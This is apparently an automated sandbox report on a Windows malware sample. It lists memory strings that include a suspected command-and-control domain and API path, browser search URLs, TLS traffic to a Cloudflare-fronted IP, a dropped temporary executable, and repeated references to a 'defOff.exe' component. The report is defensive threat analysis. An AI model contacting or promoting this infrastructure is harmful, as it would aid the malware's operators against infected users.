              Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
              Source: file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1566909072.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.s
              Source: file.exe, 00000000.00000003.1581702066.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724509005.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1582388699.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724509005.0000000000D90000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1516669230.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1566593101.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000D90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/
              Source: file.exe, 00000000.00000002.1724509005.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/Hy
              Source: file.exe, 00000000.00000003.1722841252.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722535596.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1582388699.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724772459.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1581573293.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/api
              Source: file.exe, 00000000.00000003.1581573293.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/api/
              Source: file.exe, 00000000.00000003.1593633698.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722535596.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724772459.0000000000E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/apiAE
              Source: file.exe, 00000000.00000003.1593633698.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722535596.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724772459.0000000000E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/apit
              Source: file.exe, 00000000.00000003.1548543584.00000000055D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/au
              Source: file.exe, 00000000.00000003.1548543584.00000000055D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/e
              Source: file.exe, 00000000.00000003.1516669230.0000000000DFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/o
              Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
              Source: file.exe, 00000000.00000003.1550224153.00000000058FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.1550224153.00000000058FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
              Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
              Source: file.exe, 00000000.00000003.1550064219.000000000566F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: file.exe, 00000000.00000003.1550224153.00000000058FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
              Source: file.exe, 00000000.00000003.1550224153.00000000058FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
              Source: file.exe, 00000000.00000003.1550224153.00000000058FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.1550224153.00000000058FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49713 version: TLS 1.2

              System Summary

              barindex
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .rsrc
              Source: file.exeStatic PE information: section name: .idata
              Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.drStatic PE information: section name:
              Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.drStatic PE information: section name: .idata
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E195CF0_3_00E195CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D8D9F20_3_00D8D9F2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DAB2820_3_00DAB282
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DAB2AF0_3_00DAB2AF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087EC200_2_0087EC20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088104F0_2_0088104F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008804600_2_00880460
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087E1A00_2_0087E1A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008979B00_2_008979B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088D7F80_2_0088D7F8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0089AB200_2_0089AB20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087F7550_2_0087F755
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008814CE0_2_008814CE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008930E00_2_008930E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008910FF0_2_008910FF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AB0F00_2_008AB0F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008750000_2_00875000
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088D0100_2_0088D010
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088CC200_2_0088CC20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088E8370_2_0088E837
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B50400_2_008B5040
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008784600_2_00878460
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088E07E0_2_0088E07E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008869970_2_00886997
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087ADB00_2_0087ADB0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008865D70_2_008865D7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008791E90_2_008791E9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008911000_2_00891100
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00876D100_2_00876D10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0089091E0_2_0089091E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008739300_2_00873930
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088ED480_2_0088ED48
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087BD500_2_0087BD50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087DA800_2_0087DA80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AAE900_2_008AAE90
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B3A900_2_008B3A90
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00891EC50_2_00891EC5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00878EF00_2_00878EF0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008738860_2_00873886
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00884A4C0_2_00884A4C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088FA4F0_2_0088FA4F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00883E450_2_00883E45
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087A2600_2_0087A260
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0089CBD00_2_0089CBD0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00879FF50_2_00879FF5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087A7200_2_0087A720
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00877B670_2_00877B67
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087DF600_2_0087DF60
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeCode function: 3_2_005659663_2_00565966
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeCode function: 3_2_006E3F653_2_006E3F65
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 0087C890 appears 40 times
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 0087E190 appears 76 times
              Source: file.exeBinary or memory string: OriginalFilename vs file.exe
              Source: file.exe, 00000000.00000003.1701039280.0000000005BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1705478317.0000000005BBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1703625316.0000000005BB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1698641777.0000000005B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1692604897.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1691903804.0000000005A7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1696832744.0000000005C70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1694668153.0000000005B4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1698281938.0000000005B82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1692515448.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1702724946.0000000005BAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1688991847.0000000005B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1692422559.0000000005A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1688750570.0000000005A7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1697989986.0000000005B90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1693057445.0000000005A72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1693871949.0000000005B3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1706626900.0000000005A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1691807943.00000000058D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1699260433.0000000005CC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1697493022.0000000005A72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1703978099.0000000005A77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1696165061.0000000005B64000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1706178582.0000000005A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1698879077.0000000005B98000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1689072701.0000000005A81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1689140816.0000000005B1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1706476622.0000000005D1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1700495358.0000000005A7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1695741172.0000000005B67000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1706060227.0000000005D05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1693152717.0000000005B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1697876289.0000000005A73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1695528867.0000000005C4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1692219289.0000000005BCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1694475374.0000000005A7B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1688831240.0000000005B21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1697274192.0000000005B72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1696061769.0000000005A74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1722448530.00000000055D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1693343064.0000000005A77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1699382892.0000000005A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1692966752.0000000005B25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1694373069.0000000005B4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1688910463.0000000005A7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1696386807.0000000005B64000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1698761229.0000000005A7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1693777935.0000000005A72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1692700257.0000000005A7B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1705313804.0000000005A7B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1692145020.0000000005B1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1701908203.0000000005A77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1695952801.0000000005B69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1694162065.0000000005B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1703358373.0000000005A7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1695850243.0000000005A7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1698522844.0000000005A7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1694261262.0000000005A7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1694771183.0000000005A74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1705161156.0000000005BB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1704207586.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1706330576.0000000005BC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1696494543.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1695634528.0000000005A7B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1692892270.0000000005A79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1696941357.0000000005A81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1693435737.0000000005B3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1692064931.0000000005A72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1720947738.0000000005A78000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1699131843.0000000005B94000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1694064884.0000000005A81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1692795611.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
